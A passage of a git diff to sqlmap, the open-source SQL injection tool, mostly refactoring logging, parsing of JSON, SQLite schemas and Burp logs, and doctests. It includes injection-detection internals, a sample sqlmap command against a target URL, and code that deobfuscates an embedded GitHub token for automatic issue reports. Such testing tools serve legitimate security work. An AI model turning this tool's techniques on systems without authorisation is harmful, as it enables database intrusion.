length == 0: + raise IndexError("BigArray index out of range") + while y < 0: - y += len(self) + y += length index = y // self.chunk_length offset = y % self.chunk_length @@ -198,7 +218,10 @@ def __repr__(self): def __iter__(self): for i in xrange(len(self)): - yield self[i] + try: + yield self[i] + except IndexError: + break def __len__(self): return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1]) diff --git a/lib/core/common.py b/lib/core/common.py index a6d9acaadb0..d54dd1b8c3e 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -35,6 +35,7 @@ import time import types import unicodedata +import zlib from difflib import SequenceMatcher from math import sqrt @@ -104,6 +105,7 @@ from lib.core.optiondict import optDict from lib.core.settings import BANNER from lib.core.settings import BOLD_PATTERNS +from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES @@ -128,13 +130,14 @@ from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES from lib.core.settings import GIT_PAGE from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN -from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX +from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_REGEX from lib.core.settings import HASHDB_MILESTONE_VALUE from lib.core.settings import HOST_ALIASES from lib.core.settings import HTTP_CHUNKED_SPLIT_KEYWORDS from lib.core.settings import IGNORE_PARAMETERS from lib.core.settings import IGNORE_SAVE_OPTIONS from lib.core.settings import INFERENCE_UNKNOWN_CHAR +from lib.core.settings import INJECT_HERE_REGEX from lib.core.settings import IP_ADDRESS_REGEX from lib.core.settings import ISSUES_PAGE from lib.core.settings import IS_TTY @@ -251,6 +254,10 @@ def getDbms(versions=None): if versions is None and Backend.getVersionList(): versions = Backend.getVersionList() + # NOTE: preventing ugly (e.g.) "back-end DBMS: MySQL Unknown" + if isListLike(versions) and UNKNOWN_DBMS_VERSION in versions: + versions = None + return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(filterNone(versions))) @staticmethod @@ -350,7 +357,7 @@ def setDbms(dbms): elif kb.dbms is not None and kb.dbms != dbms: warnMsg = "there appears to be a high probability that " warnMsg += "this could be a false positive case" - logger.warn(warnMsg) + logger.warning(warnMsg) msg = "sqlmap previously fingerprinted back-end DBMS as " msg += "%s. However now it has been fingerprinted " % kb.dbms @@ -370,7 +377,7 @@ def setDbms(dbms): break else: warnMsg = "invalid value" - logger.warn(warnMsg) + logger.warning(warnMsg) elif kb.dbms is None: kb.dbms = aliasToDbmsEnum(dbms) @@ -428,7 +435,7 @@ def setOs(os): break else: warnMsg = "invalid value" - logger.warn(warnMsg) + logger.warning(warnMsg) elif kb.os is None and isinstance(os, six.string_types): kb.os = os.capitalize() @@ -465,7 +472,7 @@ def setArch(): break else: warnMsg = "invalid value. Valid values are 1 and 2" - logger.warn(warnMsg) + logger.warning(warnMsg) return kb.arch @@ -589,11 +596,14 @@ def isVersionWithin(versionList): def isVersionGreaterOrEqualThan(version): retVal = False - if Backend.getVersion() is not None and version is not None: + if all(_ not in (None, UNKNOWN_DBMS_VERSION) for _ in (Backend.getVersion(), version)): + _version = unArrayizeValue(Backend.getVersion()) + _version = re.sub(r"[<>= ]", "", _version) + try: - retVal = LooseVersion(Backend.getVersion()) >= LooseVersion(version) + retVal = LooseVersion(_version) >= LooseVersion(version) except: - retVal = str(Backend.getVersion()) >= str(version) + retVal = str(_version) >= str(version) return retVal @@ -653,13 +663,13 @@ def paramToDict(place, parameters=None): if not conf.multipleTargets and not (conf.csrfToken and re.search(conf.csrfToken, parameter, re.I)): _ = urldecode(testableParameters[parameter], convall=True) - if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): + if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not re.search(GOOGLE_ANALYTICS_COOKIE_REGEX, parameter): warnMsg = "it appears that you have provided tainted parameter values " warnMsg += "('%s') with most likely leftover " % element warnMsg += "chars/statements from manual SQL injection test(s). " warnMsg += "Please, always use only valid parameter values " warnMsg += "so sqlmap could be able to run properly" - logger.warn(warnMsg) + logger.warning(warnMsg) message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] " @@ -669,7 +679,7 @@ def paramToDict(place, parameters=None): warnMsg = "provided value for parameter '%s' is empty. " % parameter warnMsg += "Please, always use only valid parameter values " warnMsg += "so sqlmap could be able to run properly" - logger.warn(warnMsg) + logger.warning(warnMsg) if place in (PLACE.POST, PLACE.GET): for regex in (r"\A((?:<[^>]+>)+\w+)((?:<[^>]+>)+)\Z", r"\A([^\w]+.*\w+)([^\w]+)\Z"): @@ -703,8 +713,16 @@ def walk(head, current=None): if value: walk(head, value) - deserialized = json.loads(testableParameters[parameter]) - walk(deserialized) + # NOTE: for cases with custom injection marker(s) inside (e.g. https://github.com/sqlmapproject/sqlmap/issues/4137#issuecomment-2013783111) - p.s. doesn't care too much about the structure (e.g. injection into the flat array values) + if CUSTOM_INJECTION_MARK_CHAR in testableParameters[parameter]: + for match in re.finditer(r'(\w+)[^\w]*"\s*:[^\w]*\w*%s' % re.escape(CUSTOM_INJECTION_MARK_CHAR), testableParameters[parameter]): + key = match.group(1) + value = testableParameters[parameter].replace(match.group(0), match.group(0).replace(CUSTOM_INJECTION_MARK_CHAR, BOUNDED_INJECTION_MARKER)) + candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % value, parameters) + + if not candidates: + deserialized = json.loads(testableParameters[parameter]) + walk(deserialized) if candidates: message = "it appears that provided value for %sparameter '%s' " % ("%s " % place if place != parameter else "", parameter) @@ -734,7 +752,7 @@ def walk(head, current=None): if len(conf.testParameter) > 1: warnMsg = "provided parameters '%s' " % paramStr warnMsg += "are not inside the %s" % place - logger.warn(warnMsg) + logger.warning(warnMsg) else: parameter = conf.testParameter[0] @@ -759,7 +777,7 @@ def walk(head, current=None): if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in getBytes(string.printable) for _ in decoded): warnMsg = "provided parameter '%s' " % parameter warnMsg += "appears to be '%s' encoded" % encoding - logger.warn(warnMsg) + logger.warning(warnMsg) break except: pass @@ -810,7 +828,7 @@ def getManualDirectories(): else: warnMsg = "unable to automatically retrieve the web server " warnMsg += "document root" - logger.warn(warnMsg) + logger.warning(warnMsg) directories = [] @@ -876,7 +894,7 @@ def getManualDirectories(): def getAutoDirectories(): """ >>> pushValue(kb.absFilePaths) - >>> kb.absFilePaths = ["C:\\inetpub\\wwwroot\\index.asp", "/var/www/html"] + >>> kb.absFilePaths = [r"C:\\inetpub\\wwwroot\\index.asp", "/var/www/html"] >>> getAutoDirectories() ['C:/inetpub/wwwroot', '/var/www/html'] >>> kb.absFilePaths = popValue() @@ -896,7 +914,7 @@ def getAutoDirectories(): retVal.add(directory) else: warnMsg = "unable to automatically parse any web server path" - logger.warn(warnMsg) + logger.warning(warnMsg) return list(retVal) @@ -1025,10 +1043,15 @@ def dataToStdout(data, forceOutput=False, bold=False, contentType=None, status=C sys.stdout.write(stdoutEncode(clearColors(data)), status, contentType) else: sys.stdout.write(stdoutEncode(setColor(data, bold=bold) if coloring else clearColors(data))) - - sys.stdout.flush() except IOError: pass + except UnicodeEncodeError: + sys.stdout.write(re.sub(r"[^ -~]", '?', clearColors(data))) + finally: + try: + sys.stdout.flush() + except IOError: + raise SystemExit if multiThreadMode: logging._releaseLock() @@ -1312,7 +1335,10 @@ def isZipFile(filename): checkFile(filename) - return openFile(filename, "rb", encoding=None).read(len(ZIP_HEADER)) == ZIP_HEADER + with openFile(filename, "rb", encoding=None) as f: + header = f.read(len(ZIP_HEADER)) + + return header == ZIP_HEADER def isDigit(value): """ @@ -1379,6 +1405,38 @@ def banner(): dataToStdout(result, forceOutput=True) +def parseJson(content): + """ + This function parses POST_HINT.JSON and POST_HINT.JSON_LIKE content + + >>> parseJson("{'id':1}")["id"] == 1 + True + >>> parseJson('{"id":1}')["id"] == 1 + True + """ + + quote = None + retVal = None + + for regex in (r"'[^']+'\s*:", r'"[^"]+"\s*:'): + match = re.search(regex, content) + if match: + quote = match.group(0)[0] + + try: + if quote == '"': + retVal = json.loads(content) + elif quote == "'": + content = content.replace('"', '\\"') + content = content.replace("\\'", BOUNDARY_BACKSLASH_MARKER) + content = content.replace("'", '"') + content = content.replace(BOUNDARY_BACKSLASH_MARKER, "'") + retVal = json.loads(content) + except: + pass + + return retVal + def parsePasswordHash(password): """ In case of Microsoft SQL Server password hash value is expanded to its components @@ -1428,6 +1486,19 @@ def cleanQuery(query): return retVal +def cleanReplaceUnicode(value): + """ + Cleans unicode for proper encode/decode + + >>> cleanReplaceUnicode(['a', 'b']) + ['a', 'b'] + """ + + def clean(value): + return value.encode(UNICODE_ENCODING, errors="replace").decode(UNICODE_ENCODING) if isinstance(value, six.text_type) else value + + return applyFunctionRecursively(value, clean) + def setPaths(rootPath): """ Sets absolute paths for project directories and files @@ -1454,6 +1525,7 @@ def setPaths(rootPath): paths.COMMON_FILES = os.path.join(paths.SQLMAP_TXT_PATH, "common-files.txt") paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt") paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt') + paths.DIGEST_FILE = os.path.join(paths.SQLMAP_TXT_PATH, "sha256sums.txt") paths.SQL_KEYWORDS = os.path.join(paths.SQLMAP_TXT_PATH, "keywords.txt") paths.SMALL_DICT = os.path.join(paths.SQLMAP_TXT_PATH, "smalldict.txt") paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt") @@ -1521,6 +1593,12 @@ def parseTargetDirect(): 'testdb' >>> conf.dbmsPass 'testpass' + >>> conf.direct = "mysql://user:'P@ssw0rd'@127.0.0.1:3306/test" + >>> parseTargetDirect() + >>> conf.dbmsPass + 'P@ssw0rd' + >>> conf.hostname + '127.0.0.1' >>> conf.direct = popValue() """ @@ -1537,8 +1615,8 @@ def parseTargetDirect(): conf.dbms = details.group("dbms") if details.group("credentials"): - conf.dbmsUser = details.group("user") - conf.dbmsPass = details.group("pass") + conf.dbmsUser = details.group("user").strip("'\"") + conf.dbmsPass = details.group("pass").strip("'\"") else: if conf.dbmsCred: conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':') @@ -1580,7 +1658,7 @@ def parseTargetDirect(): if remote: warnMsg = "direct connection over the network for " warnMsg += "%s DBMS is not supported" % dbmsName - logger.warn(warnMsg) + logger.warning(warnMsg) conf.hostname = "localhost" conf.port = 0 @@ -1709,7 +1787,7 @@ def parseTargetUrl(): errMsg = "invalid target URL port (%d)" % conf.port raise SqlmapSyntaxException(errMsg) - conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path)) + conf.url = getUnicode("%s://%s%s%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, (":%d" % conf.port) if not (conf.port == 80 and conf.scheme == "http" or conf.port == 443 and conf.scheme == "https") else "", conf.path)) conf.url = conf.url.replace(URI_QUESTION_MARKER, '?') if urlSplit.query: @@ -1762,7 +1840,7 @@ def expandAsteriskForColumns(expression): the SQL query string (expression) """ - match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+((`[^`]+`|[^\s]+)+)", expression) + match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+(([`'\"][^`'\"]+[`'\"]|[\w.]+)+)(\s|\Z)", expression) if match: infoMsg = "you did not provide the fields in your query. " @@ -1843,7 +1921,7 @@ def parseUnionPage(page): if re.search(r"(?si)\A%s.*%s\Z" % (kb.chars.start, kb.chars.stop), page): if len(page) > LARGE_OUTPUT_THRESHOLD: warnMsg = "large output detected. This might take a while" - logger.warn(warnMsg) + logger.warning(warnMsg) data = BigArray() keys = set() @@ -2248,7 +2326,7 @@ def ntToPosixSlashes(filepath): Replaces all occurrences of NT backslashes in provided filepath with Posix slashes - >>> ntToPosixSlashes('C:\\Windows') + >>> ntToPosixSlashes(r'C:\\Windows') 'C:/Windows' """ @@ -2460,21 +2538,22 @@ def initCommonOutputs(): kb.commonOutputs = {} key = None - for line in openFile(paths.COMMON_OUTPUTS, 'r'): - if line.find('#') != -1: - line = line[:line.find('#')] + with openFile(paths.COMMON_OUTPUTS, 'r') as f: + for line in f: + if line.find('#') != -1: + line = line[:line.find('#')] - line = line.strip() + line = line.strip() - if len(line) > 1: - if line.startswith('[') and line.endswith(']'): - key = line[1:-1] - elif key: - if key not in kb.commonOutputs: - kb.commonOutputs[key] = set() + if len(line) > 1: + if line.startswith('[') and line.endswith(']'): + key = line[1:-1] + elif key: + if key not in kb.commonOutputs: + kb.commonOutputs[key] = set() - if line not in kb.commonOutputs[key]: - kb.commonOutputs[key].add(line) + if line not in kb.commonOutputs[key]: + kb.commonOutputs[key].add(line) def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False): """ @@ -2732,7 +2811,7 @@ def wasLastResponseDelayed(): if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: warnMsg = "time-based standard deviation method used on a model " warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES - logger.warn(warnMsg) + logger.warning(warnMsg) lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) @@ -2895,7 +2974,7 @@ def _(match): if spaceplus: result = result.replace('+', ' ') # plus sign has a special meaning in URL encoded data (hence the usage of _urllib.parse.unquote_plus in convall case) - result = re.sub(r"%([0-9a-fA-F]{2})", _, result) + result = re.sub(r"%([0-9a-fA-F]{2})", _, result or "") result = getUnicode(result, encoding or UNICODE_ENCODING) @@ -3055,6 +3134,8 @@ def extractRegexResult(regex, content, flags=0): >>> extractRegexResult(r'a(?P[^g]+)g', 'abcdefg') 'bcdef' + >>> extractRegexResult(r'a(?P[^g]+)g', 'ABCDEFG', re.I) + 'BCDEF' """ retVal = None @@ -3120,7 +3201,14 @@ def isNumPosStrValue(value): False """ - return ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT + retVal = False + + try: + retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT + except ValueError: + pass + + return retVal @cachedmethod def aliasToDbmsEnum(dbms): @@ -3340,19 +3428,39 @@ def parseSqliteTableSchema(value): >>> kb.data.cachedColumns = {} >>> parseSqliteTableSchema("CREATE TABLE users(\\n\\t\\tid INTEGER,\\n\\t\\tname TEXT\\n);") True - >>> repr(kb.data.cachedColumns).count(',') == 1 + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE dummy(`foo bar` BIGINT, \\"foo\\" VARCHAR, 'bar' TEXT)"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('foo bar', 'BIGINT'), ('foo', 'VARCHAR'), ('bar', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE suppliers(\\n\\tsupplier_id INTEGER PRIMARY KEY DESC,\\n\\tname TEXT NOT NULL\\n);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('supplier_id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE country_languages (\\n\\tcountry_id INTEGER NOT NULL,\\n\\tlanguage_id INTEGER NOT NULL,\\n\\tPRIMARY KEY (country_id, language_id),\\n\\tFOREIGN KEY (country_id) REFERENCES countries (country_id) ON DELETE CASCADE ON UPDATE NO ACTION,\\tFOREIGN KEY (language_id) REFERENCES languages (language_id) ON DELETE CASCADE ON UPDATE NO ACTION);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('country_id', 'INTEGER'), ('language_id', 'INTEGER')) True """ retVal = False + value = extractRegexResult(r"(?s)\((?P.+)\)", value) + if value: table = {} - columns = {} + columns = OrderedDict() + + value = re.sub(r"\(.+?\)", "", value).strip() - for match in re.finditer(r"[(,]\s*[\"'`]?(\w+)[\"'`]?(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I): + for match in re.finditer(r"(?:\A|,)\s*(([\"'`]).+?\2|\w+)(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I): + column = match.group(1).strip(match.group(2) or "") + if re.search(r"(?i)\A(CONSTRAINT|PRIMARY|UNIQUE|CHECK|FOREIGN)\b", column.strip()): + continue retVal = True - columns[match.group(1)] = match.group(2) or "TEXT" + + columns[column] = match.group(3) or "TEXT" table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns kb.data.cachedColumns[conf.db] = table @@ -3534,7 +3642,7 @@ def initTechnique(technique=None): else: warnMsg = "there is no injection data available for technique " warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) - logger.warn(warnMsg) + logger.warning(warnMsg) except SqlmapDataException: errMsg = "missing data in old session file(s). " @@ -3563,6 +3671,8 @@ def unArrayizeValue(value): >>> unArrayizeValue(['1']) '1' + >>> unArrayizeValue('1') + '1' >>> unArrayizeValue(['1', '2']) '1' >>> unArrayizeValue([['a', 'b'], 'c']) @@ -3607,10 +3717,12 @@ def joinValue(value, delimiter=','): '1,2' >>> joinValue('1') '1' + >>> joinValue(['1', None]) + '1,None' """ if isListLike(value): - retVal = delimiter.join(value) + retVal = delimiter.join(getText(_ if _ is not None else "None") for _ in value) else: retVal = value @@ -3647,7 +3759,7 @@ def priorityFunction(test): if test.stype == PAYLOAD.TECHNIQUE.UNION: retVal = SORT_ORDER.LAST - elif "details" in test and "dbms" in test.details: + elif "details" in test and "dbms" in (test.details or {}): if intersect(test.details.dbms, Backend.getIdentifiedDbms()): retVal = SORT_ORDER.SECOND else: @@ -3683,7 +3795,7 @@ def showHttpErrorCodes(): if kb.httpErrorCodes: warnMsg = "HTTP error codes detected during run:\n" warnMsg += ", ".join("%d (%s) - %d times" % (code, _http_client.responses[code] if code in _http_client.responses else '?', count) for code, count in kb.httpErrorCodes.items()) - logger.warn(warnMsg) + logger.warning(warnMsg) if any((str(_).startswith('4') or str(_).startswith('5')) and _ != _http_client.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes): msg = "too many 4xx and/or 5xx HTTP error codes " msg += "could mean that some kind of protection is involved (e.g. WAF)" @@ -3756,29 +3868,6 @@ def decodeIntToUnicode(value): return retVal -def checkIntegrity(): - """ - Checks integrity of code files during the unhandled exceptions - """ - - if not paths: - return - - logger.debug("running code integrity check") - - retVal = True - - baseTime = os.path.getmtime(paths.SQLMAP_SETTINGS_PATH) + 3600 # First hour free parking :) - for root, _, filenames in os.walk(paths.SQLMAP_ROOT_PATH): - for filename in filenames: - if re.search(r"(\.py|\.xml|_)\Z", filename): - filepath = os.path.join(root, filename) - if os.path.getmtime(filepath) > baseTime: - logger.error("wrong modification time of '%s'" % filepath) - retVal = False - - return retVal - def getDaysFromLastUpdate(): """ Get total number of days from last update @@ -3911,13 +4000,14 @@ def createGithubIssue(errMsg, excMsg): if closed: warnMsg += " and resolved. Please update to the latest " warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE - logger.warn(warnMsg) + logger.warning(warnMsg) return except: pass data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} - req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % decodeBase64(GITHUB_REPORT_OAUTH_TOKEN, binary=False), HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + token = getText(zlib.decompress(decodeBase64(GITHUB_REPORT_OAUTH_TOKEN[::-1], binary=True))[0::2][::-1]) + req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % token, HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) try: content = getText(_urllib.request.urlopen(req).read()) @@ -3941,7 +4031,7 @@ def createGithubIssue(errMsg, excMsg): warnMsg += " ('%s')" % _excMsg if "Unauthorized" in warnMsg: warnMsg += ". Please update to the latest revision" - logger.warn(warnMsg) + logger.warning(warnMsg) def maskSensitiveData(msg): """ @@ -3949,7 +4039,7 @@ def maskSensitiveData(msg): >>> maskSensitiveData('python sqlmap.py -u "http://www.test.com/vuln.php?id=1" --banner') == 'python sqlmap.py -u *********************************** --banner' True - >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index') == 'sqlmap.py -u **************************' + >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index --auth-type=basic --auth-creds=foo:bar\\ndummy line') == 'sqlmap.py -u ************************** --auth-type=***** --auth-creds=*******\\ndummy line' True """ @@ -3965,7 +4055,7 @@ def maskSensitiveData(msg): retVal = retVal.replace(value, '*' * len(value)) # Just in case (for problematic parameters regarding user encoding) - for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal): + for match in re.finditer(r"(?im)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|$)", retVal): retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) # Fail-safe substitutions @@ -4132,10 +4222,11 @@ def _thread(regex): if not suppressWarning: debugMsg = "turning off reflection removal mechanism (for optimization purposes)" logger.debug(debugMsg) - except MemoryError: + + except (MemoryError, SystemError): kb.reflectiveMechanism = False if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (because of low memory issues)" + debugMsg = "turning off reflection removal mechanism" logger.debug(debugMsg) return retVal @@ -4177,6 +4268,9 @@ def safeSQLIdentificatorNaming(name, isTable=False): retVal = name + if conf.unsafeNaming: + return retVal + if isinstance(name, six.string_types): retVal = getUnicode(name) _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) @@ -4207,7 +4301,8 @@ def safeSQLIdentificatorNaming(name, isTable=False): retVal = "[%s]" % retVal if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): - retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) + if (conf.db or "").lower() != "information_schema": # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5192 + retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) return retVal @@ -4333,7 +4428,7 @@ def __init__(self): if not options: warnMsg = "mnemonic '%s' can't be resolved" % name - logger.warn(warnMsg) + logger.warning(warnMsg) elif name in options: found = name debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) @@ -4342,7 +4437,7 @@ def __init__(self): found = sorted(options.keys(), key=len)[0] warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options)) warnMsg += "Resolved to shortest of those ('%s')" % found - logger.warn(warnMsg) + logger.warning(warnMsg) if found: found = options[found] @@ -4557,7 +4652,7 @@ def isAdminFromPrivileges(privileges): return retVal -def findPageForms(content, url, raise_=False, addToTargets=False): +def findPageForms(content, url, raiseException=False, addToTargets=False): """ Parses given page content for possible forms (Note: still not implemented for Python3) @@ -4575,7 +4670,7 @@ def geturl(http://github.com/self): if not content: errMsg = "can't parse forms as the page content appears to be blank" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -4597,7 +4692,7 @@ def geturl(http://github.com/self): forms = ParseResponse(filtered, backwards_compat=False) except: errMsg = "no success" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -4624,14 +4719,14 @@ def geturl(http://github.com/self): except (ValueError, TypeError) as ex: errMsg = "there has been a problem while " errMsg += "processing page forms ('%s')" % getSafeExString(ex) - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) else: url = urldecode(request.get_full_url(), kb.pageEncoding) method = request.get_method() - data = request.data + data = unArrayizeValue(request.data) data = urldecode(data, kb.pageEncoding, spaceplus=False) if not data and method and method.upper() == HTTPMETHOD.POST: @@ -4676,7 +4771,7 @@ def geturl(http://github.com/self): if not retVal and not conf.crawlDepth: errMsg = "there were no forms found at the given target URL" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -4748,7 +4843,7 @@ def checkOldOptions(args): warnMsg = "switch/option '%s' is deprecated" % _ if DEPRECATED_OPTIONS[_]: warnMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] - logger.warn(warnMsg) + logger.warning(warnMsg) def checkSystemEncoding(): """ @@ -4766,7 +4861,7 @@ def checkSystemEncoding(): logger.critical(errMsg) warnMsg = "temporary switching to charset 'cp1256'" - logger.warn(warnMsg) + logger.warning(warnMsg) _reload_module(sys) sys.setdefaultencoding("cp1256") @@ -4854,6 +4949,12 @@ def decodeDbmsHexValue(value, raw=False): >>> decodeDbmsHexValue('3132332031') == u'123 1' True + >>> decodeDbmsHexValue('31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('00310032003300200031') == u'123 1' + True + >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1' + True >>> decodeDbmsHexValue('313233203') == u'123 ?' True >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2'] @@ -4892,6 +4993,9 @@ def _(value): if not isinstance(retVal, six.text_type): retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING) + if u"\x00" in retVal: + retVal = retVal.replace(u"\x00", u"") + return retVal try: @@ -4980,6 +5084,7 @@ def resetCookieJar(cookieJar): logger.info(infoMsg) content = readCachedFileContent(conf.loadCookies) + content = re.sub("(?im)^#httpOnly_", "", content) lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#')) handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR) os.close(handle) @@ -5175,6 +5280,9 @@ def _parseWebScarabLog(content): Parses WebScarab logs (POST method not supported) """ + if WEBSCARAB_SPLITTER not in content: + return + reqResList = content.split(WEBSCARAB_SPLITTER) for request in reqResList: @@ -5193,7 +5301,7 @@ def _parseWebScarabLog(content): logger.warning(warnMsg) continue - if not(conf.scope and not re.search(conf.scope, url, re.I)): + if not (conf.scope and not re.search(conf.scope, url, re.I)): yield (url, method, None, cookie, tuple()) def _parseBurpLog(content): @@ -5241,6 +5349,7 @@ def _parseBurpLog(content): continue getPostReq = False + forceBody = False url = None host = None method = None @@ -5257,11 +5366,13 @@ def _parseBurpLog(content): if not line.strip() and index == len(lines) - 1: break + line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line) + newline = "\r\n" if line.endswith('\r') else '\n' line = line.strip('\r') match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None - if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: + if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None: data = "" params = True @@ -5298,16 +5409,18 @@ def _parseBurpLog(content): elif key.upper() == HTTP_HEADER.HOST.upper(): if '://' in value: scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") + port = extractRegexResult(r":(?P\d+)\Z", value) + if port: + host = value[:-(1 + len(port))] + else: + host = value # Avoid to add a static content length header to # headers and consider the following lines as # POSTed data if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): + forceBody = True params = True # Avoid proxy and connection type related headers @@ -5338,7 +5451,7 @@ def _parseBurpLog(content): scheme = None port = None - if not(conf.scope and not re.search(conf.scope, url, re.I)): + if not (conf.scope and not re.search(conf.scope, url, re.I)): yield (url, conf.method or method, data, cookie, tuple(headers)) content = 